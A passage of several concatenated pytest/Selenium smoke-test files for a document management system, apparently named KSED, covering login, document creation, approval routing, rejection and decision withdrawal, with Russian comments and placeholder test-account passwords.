innerSogl = page3.softDecision_RD()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_18327(web_browser):
""" Внутреннее согласование - отзыв решения после согласования"""
# Шаг 1 создание документа
page = KSEDchangeAfterAcceptInnerSogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
#Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
#page = KSEDinnerSogl_RD(web_browser)
#LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 на правление на внутреннее согласование
page2 = KSEDchangeAfterAcceptInnerSogl_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
innerSogl = page2.innerSogl()
Logout = page2.USER_LOGOUTs() # Выход из системы
# Шаг 5 Отклонение и отзыв решения на внутреннем согласовании
page3 = KSEDchangeAfterAcceptInnerSogl_RD(web_browser)
LogIn_page = page3.LogIN('tst_user11', 'Changeme!')
getDoc = page3.getDoc()
innerSogl = page3.AcceptInnerSogl()
innerSogl = page3.returnDecision_RD()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_18329(web_browser):
""" Внутреннее согласование - отзыв решения после согласования с замечаниями"""
# Шаг 1 создание документа
page = KSEDchangeAfterAcceptWithRemarkInnerSogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
#Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
#page = KSEDinnerSogl_RD(web_browser)
#LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 на правление на внутреннее согласование
page2 = KSEDchangeAfterAcceptWithRemarkInnerSogl_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
innerSogl = page2.innerSogl()
Logout = page2.USER_LOGOUTs() # Выход из системы
# Шаг 5 Отклонение и отзыв решения на внутреннем согласовании
page3 = KSEDchangeAfterAcceptWithRemarkInnerSogl_RD(web_browser)
LogIn_page = page3.LogIN('tst_user11', 'Changeme!')
getDoc = page3.getDoc()
innerSogl = page3.AcceptInnerSogl()
innerSogl = page3.returnDecision_RD()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_18330(web_browser):
""" Внутреннее согласование - смягчение решения после согласования с замечаниями"""
# Шаг 1 создание документа
page = KSEDsoftDisAfterAcceptWithRemarkInnerSogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
#Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
#page = KSEDinnerSogl_RD(web_browser)
#LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 на правление на внутреннее согласование
page2 = KSEDsoftDisAfterAcceptWithRemarkInnerSogl_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
innerSogl = page2.innerSogl()
Logout = page2.USER_LOGOUTs() # Выход из системы
# Шаг 5 Отклонение и отзыв решения на внутреннем согласовании
page3 = KSEDsoftDisAfterAcceptWithRemarkInnerSogl_RD(web_browser)
LogIn_page = page3.LogIN('tst_user11', 'Changeme!')
getDoc = page3.getDoc()
innerSogl = page3.AcceptInnerSogl()
innerSogl = page3.softDecision_RD()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_18332(web_browser):
""" Внутреннее согласование - добавление комментариев"""
# Шаг 1 создание документа
page = KSEDaddCommentInnerSogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
#Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
#page = KSEDinnerSogl_RD(web_browser)
#LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 на правление на внутреннее согласование
page2 = KSEDaddCommentInnerSogl_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
innerSogl = page2.innerSogl()
Logout = page2.USER_LOGOUTs() # Выход из системы
# Шаг 5 согласование на внутреннее согласование
page3 = KSEDaddCommentInnerSogl_RD(web_browser)
LogIn_page = page2.LogIN('tst_user11', 'Changeme!')
getDoc = page2.getDoc()
addComment = page2.addComment()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_18334(web_browser):
""" Внутреннее согласование после удаления добавленого комментария"""
# Шаг 1 создание документа
page = KSEDInnerSoglAfterAddComment_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
#Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
#page = KSEDinnerSogl_RD(web_browser)
#LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 на правление на внутреннее согласование
page2 = KSEDInnerSoglAfterAddComment_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
innerSogl = page2.innerSogl()
Logout = page2.USER_LOGOUTs() # Выход из системы
# Шаг 5 согласование на внутреннее согласование
page3 = KSEDInnerSoglAfterAddComment_RD(web_browser)
LogIn_page = page2.LogIN('tst_user11', 'Changeme!')
getDoc = page2.getDoc()
addComment = page2.addComment()
accept = page2.AcceptInnerSoglWithComment()
accept2 = page2.AcceptInnerSogl()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_18336(web_browser):
""" Основное согласование c комментариями """
# Шаг 1 создание документа
page = KSEDacceptSoglwithRemark_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
# Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
# page = KSEDacceptSoglwithRemark_RD(web_browser)
# LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
# getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 отклонение созгаласования
page2 = KSEDacceptSoglwithRemark_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
accept = page2.acceptDoc()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_18337(web_browser):
""" Основное согласование c комментариями и отзыв решения"""
# Шаг 1 создание документа
page = KSEDrejectAfterAcceptSoglwithRemark_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
# Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
# page = KSEDacceptSoglwithRemark_RD(web_browser)
# LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
# getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 отклонение созгаласования
page2 = KSEDrejectAfterAcceptSoglwithRemark_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
accept = page2.acceptDoc()
returnDis = page2.returnDecision_RD()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_18338(web_browser):
""" Основное согласование c комментариями и смягчение решения"""
# Шаг 1 создание документа
page = KSEDsoftDisAfterAcceptSoglwithRemark_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
# Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
# page = KSEDacceptSoglwithRemark_RD(web_browser)
# LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
# getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 отклонение созгаласования
page2 = KSEDsoftDisAfterAcceptSoglwithRemark_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
accept = page2.acceptDoc()
softDis = page2.softDecision_RD()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_18360(web_browser):
""" Отзыв решения делегата после отклонения согласования основного согласующего"""
# Шаг 1 создание документа
page = KSEDreturnDisFromDelegatAfterReject_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
# Шаг 2 создание маршрута
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 отклонение созгаласования
page2 = KSEDreturnDisFromDelegatAfterReject_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
reject = page2.rejectDoc()
Logout = page.USER_LOGOUTs() # Выход из системы
page3 = KSEDreturnDisFromDelegatAfterReject_RD(web_browser)
LogIn_page = page3.LogIN('tst_user1', 'Changeme!')
getDoc = page2.getDoc()
returnDis = page3.returnDecision_RD()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_18361(web_browser):
""" Отзыв решения после согласования делегата"""
# Шаг 1 создание документа
page = KSEDreturnDisAfterTakeTask(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
page = KSEDreturnDisAfterTakeTask(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 забрать задачу
page2 = KSEDreturnDisAfterTakeTask(web_browser)
LogIn_page = page2.LogIN('tst_user1', 'Changeme!')
getDoc = page2.getDoc()
take = page2.takeTask_RD()
reject = page2.rejectDoc()
Logout = page.USER_LOGOUTs() # Выход из системы
page3 = KSEDreturnDisAfterTakeTask(web_browser)
LogIn_page = page3.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
returnDis = page3.returnDecision_RD()
@pytest.mark.KSED_smoke_test
# #@pytest.fixture(scope="session")
def test_18362(web_browser):
""" Отзыв решения делегата после отклонения согласования основного согласующего"""
# Шаг 1 создание документа
page = KSEDsoftDisFromDelegatAfterReject_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
# Шаг 2 создание маршрута
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 отклонение созгаласования
page2 = KSEDsoftDisFromDelegatAfterReject_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
reject = page2.rejectDoc()
Logout = page.USER_LOGOUTs() # Выход из системы
page3 = KSEDsoftDisFromDelegatAfterReject_RD(web_browser)
LogIn_page = page3.LogIN('tst_user1', 'Changeme!')
getDoc = page2.getDoc()
returnDis = page3.softDecision_RD()
@pytest.mark.KSED_smoke_test
# #@pytest.fixture(scope="session")
def test_18363(web_browser):
""" Смягчение решения после согласования делегата"""
# Шаг 1 создание документа
page = KSEDsoftDisAfterTakeTask(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
page = KSEDsoftDisAfterTakeTask(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 забрать задачу
page2 = KSEDsoftDisAfterTakeTask(web_browser)
LogIn_page = page2.LogIN('tst_user1', 'Changeme!')
getDoc = page2.getDoc()
take = page2.takeTask_RD()
reject = page2.rejectDoc()
Logout = page.USER_LOGOUTs() # Выход из системы
page3 = KSEDsoftDisAfterTakeTask(web_browser)
LogIn_page = page3.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
returnDis = page3.softDecision_RD()
--- FILE SEPARATOR ---
#!/bin/sh
#!/usr/bin/python3
# -*- encoding=utf8 -*-
# How to run:
#.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
#.... allure generate ./allure_report && allure open allure-report
# -s команда вывода всех print в консоль
import pytest
import allure
from KSED.Tests.tk11690 import KSEDsubordinate_doc
from KSED.Tests.tk11689 import KSEDViewTheDocumentCard
@allure.feature('Просмотр связанных документов в области просмотра разделов (Навигатор)')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_11690(web_browser):
""" Просмотр связанных документов в области просмотра разделов (Навигатор) """
page = KSEDsubordinate_doc(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!') # Авторизуемся
getDoc = page.subordinate_doc()
@allure.feature('Переход в карточку документа из области просмотра разделов (Навигатор)')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_11689(web_browser):
""" Переход в карточку документа из области просмотра разделов (Навигатор) """
page = KSEDViewTheDocumentCard(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!') # Авторизуемся
ViewTheDocumentCard = page.ViewTheDocumentCard()
--- FILE SEPARATOR ---
#!/bin/sh
#!/usr/bin/python3
# -*- encoding=utf8 -*-
# How to run:
#.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
#.... allure generate ./allure_report && allure open allure-report
# -s команда вывода всех print в консоль
import pytest
import allure
from KSED.Tests.tk11639 import KSEDLogin
@allure.feature('Авторизация')
# @pytest.mark.parametrize('Ln', ['StroganovSN', 'tst_gid'])
# @pytest.mark.parametrize('Ps', ['12345'])
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_11639(web_browser):
""" Проверка авторизации. """
page = KSEDLogin(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
--- FILE SEPARATOR ---
#!/bin/sh
#!/usr/bin/python3
# -*- encoding=utf8 -*-
# How to run:
#.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
#.... allure generate ./allure_report && allure open allure-report
# -s команда вывода всех print в консоль
import pytest
import allure
from KSED.Tests.tk11664 import KSEDCreatDocPD
from KSED.Tests.tk13799 import KSEDCreatDocPDSoglas
from KSED.Tests.tk11955 import KSEDCreatDocPDSoglas_sendDorab
from KSED.Tests.tk14079 import KSEDPDSoglas
from KSED.Tests.tk11957 import KSEDPDPodpisanie_Otklon
@allure.feature('Создание Произвольного документа')
@pytest.mark.KSED_smoke_test_prior
#@pytest.fixture(scope="session")
def test_11664(web_browser):
""" Создание Произвольного документа. """
page = KSEDCreatDocPD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
@allure.feature('Направление Произвольного документа на согласование')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_13799(web_browser):
""" Создание и Направление Протокола на согласование. """
page = KSEDCreatDocPDSoglas(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getDoc = page.getDoc()
Attach = page.attachment()
NaprNaSogl = page.NapSoglasovanie()
@allure.feature('Возврат произвольного документа на доработку при согласовании.')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_11955(web_browser):
""" Возврат произвольного документа на доработку при согласовании.
Тест падает, причина - не приходит уведомление согласующему (БАГ!)"""
page = KSEDCreatDocPDSoglas_sendDorab(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!') # Авторизуемся
getDoc = page.getDoc()
#notification = page.notificationOpen() # Откроем уведомления и перейдем в документ
REJECTED = page.REJECTED() # Отклоним и вернем документ на доработку
NaprNaSogl = page.NapSoglasovanie() # Направим на согласование
@allure.feature('Согласование произвольного документа.')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_14079(web_browser):
""" Согласование произвольного документа """
page = KSEDPDSoglas(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!') # Авторизуемся
getDoc = page.getDoc()
Soglasovanie = page.Soglasovanie()
@allure.feature('Отклонение подписания и возврат ПД на доработку.')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_11957(web_browser):
""" Отклонение подписания и возврат ПД на доработку """
page = KSEDPDPodpisanie_Otklon(web_browser)
LogIn_page = page.LogIN('tst_gid', '12345') # Авторизуемся
getDoc = page.getDoc()
Podpisanie_Otklon = page.Podpisanie_Otklon()
--- FILE SEPARATOR ---
#!/bin/sh
#!/usr/bin/python3
# -*- encoding=utf8 -*-
# How to run:
#.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
#.... allure generate ./allure_report && allure open allure-report
# -s команда вывода всех print в консоль
import pytest
import allure
from KSED.Tests.tk11652 import KSEDCreatDocPVH
@allure.feature('Создание Пакет входящей корреспонденции')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_11652(web_browser):
""" Создание Пакет входящей корреспонденции. """
page = KSEDCreatDocPVH(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
--- FILE SEPARATOR ---
#!/bin/sh
#!/usr/bin/python3
# -*- encoding=utf8 -*-
# How to run:
#.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
#.... allure generate ./allure_report && allure open allure-report
# -s команда вывода всех print в консоль
import pytest
import allure
from KSED.Tests.tk11655 import KSEDCreatDocPor
from KSED.Tests.tk13862 import KSEDCreatDocPorNSoglas
from KSED.Tests.tk11778 import KSEDCreatDocPorSoglas
from KSED.Tests.tk11943 import KSEDCreatDocPorDorab
from KSED.Tests.tk12936 import KSEDDocPorSendAllure
from KSED.Tests.tk12935 import KSEDCreatDocPorNIspoln
@allure.feature('Создание Поручения')
@pytest.mark.KSED_smoke_test_prior
#@pytest.fixture(scope="session")
def test_11655(web_browser):
""" Создание Поручения. """
page = KSEDCreatDocPor(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
@allure.feature('Направление Поручения на согласование')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_13862(web_browser):
""" Направление Поручения на согласование. """
page = KSEDCreatDocPorNSoglas(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
Attach = page.attachment()
NaprNaSogl = page.NapSoglasovanie()
@allure.feature('Cогласование поручения')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_11778(web_browser):
""" Cогласование поручения. """
page = KSEDCreatDocPorSoglas(web_browser)
LogIn_page = page.LogIN('YatskinRS', 'Changeme!')
getDoc = page.getDoc()
Soglasovanie = page.Soglasovanie()
@allure.feature('Отправка отчета в поручении после согласования')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_12936(web_browser):
""" Отправка отчета в поручении после согласования. """
page = KSEDDocPorSendAllure(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getDoc = page.getDoc()
sendAllure = page.sendAllure()
@allure.feature('Направление Поручения на исполнение')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_12935(web_browser):
""" Направление Поручения на исполнение. """
page = KSEDCreatDocPorNIspoln(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
create_route = page.creation_of_the_approval_route()
Attach = page.attachment()
NapIspolnenie = page.NapIspolnenie()
@allure.feature('Возврат поручения на доработку при согласовании.')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_11943(web_browser):
""" Возврат поручения на доработку при согласовании. """
#""" ШАГ 1. Создание Поручения """
page1 = KSEDCreatDocPor(web_browser)
LogIn_page = page1.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page1.Creat()
saveLink = page1.LinkDocWFile()
# """ ШАГ 2. Направление на согласование """
page2 = KSEDCreatDocPorNSoglas(web_browser)
#LogIn_page = page2.LogIN('StroganovSN', 'Changeme!')
getDoc = page2.getDoc()
create_route = page2.creation_of_the_approval_route()
Attach = page2.attachment()
NaprNaSogl = page2.NapSoglasovanie()
Logout = page2.USER_LOGOUTs() # Выйдем из системы
# """ ШАГ 3. Отклонение согласования """
page3 = KSEDCreatDocPorDorab(web_browser)
LogIn_page = page3.LogIN('YatskinRS', 'Changeme!') # Авторизуемся согласующим созданного документа
getDoc = page3.getDoc()
REJECTED = page3.REJECTED() # Отклоним и вернем документ на доработку
# Logout = page.USER_LOGOUTs() # Выйдем из системы
#
# LogIn_page = page.LogIN('StroganovSN', 'Changeme!') # Авторизуемся инициатором
#
# getDoc = page.getDoc() # Откроем документ
#
# NaprNaSogl = page.NapSoglasovanie() # Снова направим на согласование для последовательного выполнения следующего ТК
--- FILE SEPARATOR ---
#!/bin/sh
#!/usr/bin/python3
# -*- encoding=utf8 -*-
# How to run:
#.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
#.... allure generate ./allure_report && allure open allure-report
# -s команда вывода всех print в консоль
import pytest
import allure
from KSED.Tests.tk11775 import KSEDuser_LOGOUT
from KSED.Tests.tk11774 import Edit_Password
from KSED.Tests.tk11772 import KSEDmyprofile
from KSED.Tests.tk11773 import KSEDlogicESM
from KSED.Tests.tk11728 import Edit_Profile
from KSED.Tests.tk11727 import KSEDAbsence
@allure.feature('Выход из системы')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_11775(web_browser):
""" Выход из системы. """
page = KSEDuser_LOGOUT(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
logout = page.USER_LOGOUTs()
@allure.feature('Изменение пароля пользователя')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_11774(web_browser):
""" Изменение пароля пользователя. """
page = Edit_Password(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
edit_password = page.edit_password('12345', '12345') # введем старый пароль и новый пароль
# Проверим изменился ли пароль (выйдем из системы и авторизуемся с новым паролем)
logout = page.USER_LOGOUTs()
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
@allure.feature('Страница профиля пользователя')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_11772(web_browser):
""" Страница профиля пользователя. """
page = KSEDmyprofile(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getMyprofile = page.getMyprofile()
@allure.feature('Страница Логика ECM.Мой профиль')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_11773(web_browser):
""" Страница Логика ECM.Мой профиль. """
page = KSEDlogicESM(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getMyprofile = page.getLogicESM()
@allure.feature('Изменение профиля')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_11728(web_browser):
""" Изменение профиля """
page = Edit_Profile(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getMyprofile = page.edit_profile()
@allure.feature('Включить отсутствие: "Меня нет в офисе"')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_11773(web_browser):
""" Включить отсутствие: "Меня нет в офисе". """
page = KSEDAbsence(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getMyprofile = page.getLogicESM()
Absence = page.Absence()
--- FILE SEPARATOR ---
#!/bin/sh
#!/usr/bin/python3
# -*- encoding=utf8 -*-
# How to run:
#.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
#.... allure generate ./allure_report && allure open allure-report
# -s команда вывода всех print в консоль
import pytest
import allure
from KSED.Tests.tk11669 import KSEDCreatDocP
from KSED.Tests.tk13756 import KSEDCreatDocPSoglas
from KSED.Tests.tk11952 import KSEDCreatDocP_sendDorab
@allure.feature('Создание Протокола')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_11669(web_browser):
""" Создание протокола. """
page = KSEDCreatDocP(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
@allure.feature('Направление Протокола на согласование')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_13756(web_browser):
""" Создание и Направление Протокола на согласование. """
page = KSEDCreatDocPSoglas(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
Attach = page.attachment()
addPoruch = page.addPoruchenie()
NaprNaSogl = page.NapSoglasovanie()
@allure.feature('Возврат протокола на доработку при согласовании.')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_11952(web_browser):
""" Возврат протокола на доработку при согласовании. """
page = KSEDCreatDocP_sendDorab(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!') # Авторизуемся
Creat_doc = page.Creat() # Создадим документ
Attach = page.attachment() # Добавим вложение
addPoruch = page.addPoruchenie() # Добавим пункт поручение
NaprNaSogl = page.NapSoglasovanie() # Направим на согласование
Logout = page.USER_LOGOUTs() # Выйдем из системы
LogIn_page = page.LogIN('YatskinRS', 'Changeme!') # Авторизуемся согласующим созданного документа
notification = page.notificationOpen() # Откроем уведомления и перейдем в документ
REJECTED = page.REJECTED() # Отклоним и вернем документ на доработку
--- FILE SEPARATOR ---
#!/bin/sh
#!/usr/bin/python3
# -*- encoding=utf8 -*-
# How to run:
#.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
#.... allure generate ./allure_report && allure open allure-report
# -s команда вывода всех print в консоль
import pytest
import allure
from KSED.Tests.tk11674 import KSEDCreatDocRD
from KSED.Tests.tk11706 import KSEDDocPDNapSoglas
from KSED.Tests.tk12915 import KSEDRDSoglas_sendDorab
from KSED.Tests.tk12929 import KSEDRD_sendPodpis
from KSED.Tests.tk12907 import KSEDRD_DorabPodpis
from KSED.Tests.tk12934 import KSEDRD_Podpis
@allure.feature('Создание РД')
@pytest.mark.KSED_smoke_test_prior
#@pytest.fixture(scope="session")
def test_11674(web_browser):
""" Создание Распорядительного документа. """
page = KSEDCreatDocRD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
@allure.feature('Направление РД на согласование')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_11706(web_browser):
""" Направление РД на согласование. """
page = KSEDDocPDNapSoglas(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getDoc = page.getDoc()
Attach = page.attachment()
addPunkt = page.addPunkt()
create_route = page.creation_of_the_approval_route()
adDrassilka = page.rassilka()
# Attach = page.attachment()
NaprNaSogl = page.NapSoglasovanie()
@allure.feature('Возврат РД на доработку с согласования')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_12915(web_browser):
""" Возврат РД на доработку с согласования. """
page = KSEDRDSoglas_sendDorab(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getDoc = page.getDoc()
REJECTED = page.REJECTED()
@allure.feature('Направление РД на подписание')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_12929(web_browser):
""" Направление РД на подписание. """
page = KSEDRD_sendPodpis(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getDoc = page.getDoc()
REJECTED = page.NapPodpis()
